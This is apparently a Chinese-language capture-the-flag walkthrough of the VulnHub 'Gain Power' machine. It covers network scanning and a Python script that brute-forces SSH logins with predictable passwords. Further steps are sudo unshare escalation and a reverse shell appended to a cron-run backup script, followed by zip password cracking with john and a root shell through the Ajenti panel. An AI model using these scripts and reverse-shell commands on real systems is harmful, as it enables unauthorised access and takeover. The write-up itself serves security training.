Gain Power识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor 192.168.56.100 08:00:27:a1:99:30 1 60 PCS Systemtechnik GmbH 192.168.56.254 08:00:27:57:a3:c2 1 60 PCS Systemtechnik GmbH 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scanStarting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:14 EDTNmap scan report for bogon (192.168.56.254)Host is up (0.00015s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey: | 2048 88416111e11f187dd60c38292579162c (RSA)| 256 18c5fdcecd2b92f8d9171721249d67df (ECDSA)|_ 256 84c514e4e93321416a9272b9a7331aea (ED25519)80/tcp open http Apache httpd 2.4.6 ((CentOS))|_http-title: Watch shop | eCommers| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Apache/2.4.6 (CentOS)8000/tcp open http Ajenti http control panel|_http-title: AjentiMAC Address: 08:00:27:57:A3:C2 (Oracle VirtualBox virtual NIC)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 9.86 secondsNMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ nikto -h http://192.168.56.254/ - Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.254+ Target Hostname: 192.168.56.254+ Target Port: 80+ Start Time: 2023-05-01 09:17:44 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.6 (CentOS)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST+ OSVDB-3092: /readme.txt: This might be interesting...+ OSVDB-3268: /secret/: Directory indexing found.+ OSVDB-3092: /secret/: This might be interesting...+ OSVDB-3268: /icons/: Directory indexing found.+ OSVDB-3233: /icons/README: Apache default file found.+ /login.html: Admin login page/section found.+ OSVDB-3092: /test.php: This might be interesting...+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host+ End Time: 2023-05-01 09:18:38 (GMT-4) (54 seconds)---------------------------------------------------------------------------+ 1 host(s) testednikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。
但是图片分析没有得到任何有意的结果。
└─$ ssh root@192.168.56.254 The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.ED25519 key fingerprint is SHA256:1yR5iTL+oNBeYI7ACvh1p8CYWHrzXAiOC+CSijIO9uQ.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) ___ _ ___ / __|__ _(_)_ _ | _ \_____ __ _____ _ _ | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| \___\__,_|_|_||_| |_| \___/\_/\_/\___|_| I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)I already told the format of password of everyone in the yesterday's metting.Now i have configured everything. My request is to everyone to Complete assignments on time btw one of my employee have sudo powers because he is my favourite NOTE : "This message will automatically removed after 2 days" - BOSSroot@192.168.56.254's password: 假设用户名为employee1,根据作者提示,可能密码与用户名有一定规律,比如跟用户名相同
从home家目录来看有coworker, helper,以及employee,而只有其中一个employee有sudo 权限,因此需要编写脚本找出哪个employee有sudo 权限
import paramikoimport sysimport timeclass GainPowerCls: def __init__(self) -> None: self.host = '192.168.56.254' # IP address of the virtual machine(target) print("Target: %s" % self.host) try: self.ssh_client = paramiko.SSHClient() self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) except Exception as e: print("Something is wrong: %s" % e) sys.exit() def run_sudo(self,username, password): try: print('Attempt to access by %s: %s' % (username, password)) self.ssh_client.connect(hostname=self.host,username=username, password=password) transport = self.ssh_client.get_transport() # Return the underlying .Transport object for this SSH connection. This can be used to perform lower-level tasks, like opening specific kinds of channels. session = transport.open_session() # Request a new channel to the server, of type "session". This is just an alias for calling open_channel with an argument of "session" session.set_combine_stderr(True) # Set whether stderr should be combined into stdout on this channel. The default is False, but in some cases it may be convenient to have both streams combined. session.get_pty() #Request a pseudo-terminal from the server. This is usually used right after creating a client channel, to ask the server to provide some basic terminal semantics for a shell invoked with invoke_shell. It isn't necessary (or desirable) to call this method if you're going to execute a single command with exec_command. session.exec_command('sudo -l') stdin = session.makefile('wb',-1) stdout = session.makefile('rb',-1) stdin.write(password+'\n') stdin.flush() print(stdout.read().decode('utf-8')) session.close() self.ssh_client.close() except Exception as e: print(e) sys.exit() def run(self): for i in range(1,101): username = 'employee' + str(i) password = 'employee' + str(i) self.run_sudo(username, password) print('*'*150) time.sleep(1)if __name__ == '__main__': client = GainPowerCls() client.run()运行上述python脚本可知employee64拥有sudo 权限
employee64[sudo] password for employee64: Matching Defaults entries for employee64 on localhost: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/binUser employee64 may run the following commands on localhost: (programmer) /usr/bin/unshare******************************************************************************************************************************************************┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ ssh employee64@192.168.56.254Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) ___ _ ___ / __|__ _(_)_ _ | _ \_____ __ _____ _ _ | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| \___\__,_|_|_||_| |_| \___/\_/\_/\___|_| I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)I already told the format of password of everyone in the yesterday's metting.Now i have configured everything. My request is to everyone to Complete assignments on time btw one of my employee have sudo powers because he is my favourite NOTE : "This message will automatically removed after 2 days" - BOSSemployee64@192.168.56.254's password: Permission denied, please try again.employee64@192.168.56.254's password: Last failed login: Mon May 1 22:34:48 EDT 2023 from 192.168.56.206 on ssh:nottyThere was 1 failed login attempt since the last successful login.Last login: Mon May 1 22:30:52 2023 from 192.168.56.206[employee64@localhost ~]$ iduid=1063(employee64) gid=1063(employee64) groups=1063(employee64) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023通过unshare执行不同的命名空间的bash从而得到programmer的shell
[employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash[sudo] password for employee64: bash-4.2$ iduid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023bash-4.2$ 这样我们就得到了programmer的shell
bash-4.2$ pwd/media/programmer/scriptsbash-4.2$ cat backup.sh #!/bin/bashcp /var/www/html/thisiscarddetails.txt /tmp/back.txt在/media/programmer/scripts有脚本,会被定期执行
将pspy64工具上传至目标主机的/tmp目录
bash-4.2$ cd /tmpbash-4.2$ wget http://192.168.56.206:8000/pspy64--2023-05-01 22:42:29-- http://192.168.56.206:8000/pspy64Connecting to 192.168.56.206:8000... connected.HTTP request sent, awaiting response... 200 OKLength: 3104768 (3.0M) [application/octet-stream]Saving to: ‘pspy64’100%[====================================================================================>] 3,104,768 --.-K/s in 0.01s 2023-05-01 22:42:29 (235 MB/s) - ‘pspy64’ saved [3104768/3104768]bash-4.2$ chmod +x pspy64 2023/05/01 22:44:01 CMD: UID=1183 PID=25118 | /bin/bash /media/programmer/scripts/backup.sh可知backup.sh会被UID为1183的用户定期执行
查看/etc/passwd文件可知UID为1183的用户为vanshal
bash-4.2$ ls -alhtotal 4.0Kdrwxr-xr-x. 2 programmer prome 23 May 18 2020 .drwxrwx---. 3 programmer prome 21 Aug 8 2019 ..-rwxr-xr-x. 1 programmer prome 65 May 18 2020 backup.shprogrammer用户对backup.sh脚本有修改权限
bash-4.2$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' >> backup.sh ──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ sudo nc -nlvp 5555 [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 51130bash: no job control in this shell[vanshal@localhost ~]$ ididuid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023You have mail in /var/mail/vanshal稍微等会就可以得到vanshal的shell
[vanshal@localhost ~]$ cat loccat local.txt ░██████╗░░█████╗░██╗███╗░░██╗ ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░ ██╔════╝░██╔══██╗██║████╗░██║ ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗ ██║░░██╗░███████║██║██╔██╗██║ ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝ ██║░░╚██╗██╔══██║██║██║╚████║ ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗ ╚██████╔╝██║░░██║██║██║░╚███║ ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║ ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝ ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝ You successfully owned the user of this box :-) Best of Luck for the root flag: 5c2a29d7b95868da9e503502f301e8ddTwitter : VanshalG得到了用户flag
家目录下有文件secret.zip,将其下载到Kali Linux本地
──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ wget http://192.168.56.254:9999/secret.zip--2023-05-01 22:52:19-- http://192.168.56.254:9999/secret.zipConnecting to 192.168.56.254:9999... connected.HTTP request sent, awaiting response... 200 OKLength: 439 [application/zip]Saving to: ‘secret.zip’secret.zip 100%[=====================================================>] 439 --.-KB/s in 0s 2023-05-01 22:52:19 (1.52 MB/s) - ‘secret.zip’ saved [439/439]──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ unzip secret.zip Archive: secret.zip[secret.zip] Mypasswords.txt password: ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ zip2john secret.zip > secret_hashver 2.0 efh 5455 efh 7875 secret.zip/Mypasswords.txt PKZIP Encr: TS_chk, cmplen=243, decmplen=257, crc=BC7A971B ts=7F46 cs=7f46 type=8┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash Using default input encoding: UTF-8Loaded 1 password hash (PKZIP [32/64])Will run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for status81237900 (secret.zip/Mypasswords.txt) 1g 0:00:00:00 DONE (2023-05-01 22:53) 6.250g/s 4480Kp/s 4480Kc/s 4480KC/s AnThOnY..741210Use the "--show" option to display all of the cracked passwords reliablySession completed. 破解得到了文件的密码
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ unzip secret.zipArchive: secret.zip[secret.zip] Mypasswords.txt password: inflating: Mypasswords.txt ┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ cat Mypasswords.txt aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB用上述密码可以成功访问8000端口,用户名为root
有webshell,可以运行任何命令
bash -i >& /dev/tcp/192.168.56.206/8888 0>&1┌──(kali㉿kali)-[~/Vulnhub/Gainpower]└─$ sudo nc -nlvp 8888 [sudo] password for kali: listening on [any] 8888 ...connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 45550[root@localhost /]# ididuid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0[root@localhost /]# cd /rootcd /root[root@localhost root]# ls -alhls -alhtotal 28Kdr-xr-x---. 3 root root 132 Jun 21 2020 .dr-xr-xr-x. 18 root root 240 Aug 7 2019 ..-rw-r--r--. 1 root root 18 Dec 28 2013 .bash_logout-rw-r--r--. 1 root root 176 Dec 28 2013 .bash_profile-rw-r--r--. 1 root root 176 Dec 28 2013 .bashrc-rw-r--r--. 1 root root 100 Dec 28 2013 .cshrcdrwxr-----. 3 root root 19 Aug 7 2019 .pki-rw-r--r--. 1 root root 2.1K May 18 2020 proof.txt-rw-------. 1 root root 1.0K Aug 7 2019 .rnd-rw-r--r--. 1 root root 129 Dec 28 2013 .tcshrc[root@localhost root]# cat proof.txtcat proof.txt ░██████╗░░█████╗░██╗███╗░░██╗ ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░ ██╔════╝░██╔══██╗██║████╗░██║ ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗ ██║░░██╗░███████║██║██╔██╗██║ ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝ ██║░░╚██╗██╔══██║██║██║╚████║ ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗ ╚██████╔╝██║░░██║██║██║░╚███║ ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║ ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝ ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝_________ __ .__ __ .__ \_ ___ \ ____ ____ ________________ _/ |_ __ __| | _____ _/ |_|__| ____ ____ / \ \/ / _ \ / \ / ___\_ __ \__ \\ __\ | \ | \__ \\ __\ |/ _ \ / \ \ \___( ) | \/ /_/ > | \// __ \| | | | / |__/ __ \| | | ( ) | \ \______ /\____/|___| /\___ /|__| (____ /__| |____/|____(____ /__| |__|\____/|___| / \/ \//_____/ \/ \/ \/ You successfully owned the root of this box :-)Flag: eb2e174c3883ff6b5fd871167795b4d6Twitter : VanshalG[root@localhost root]# STRIVE FOR PROGRESS,NOT FOR PERFECTION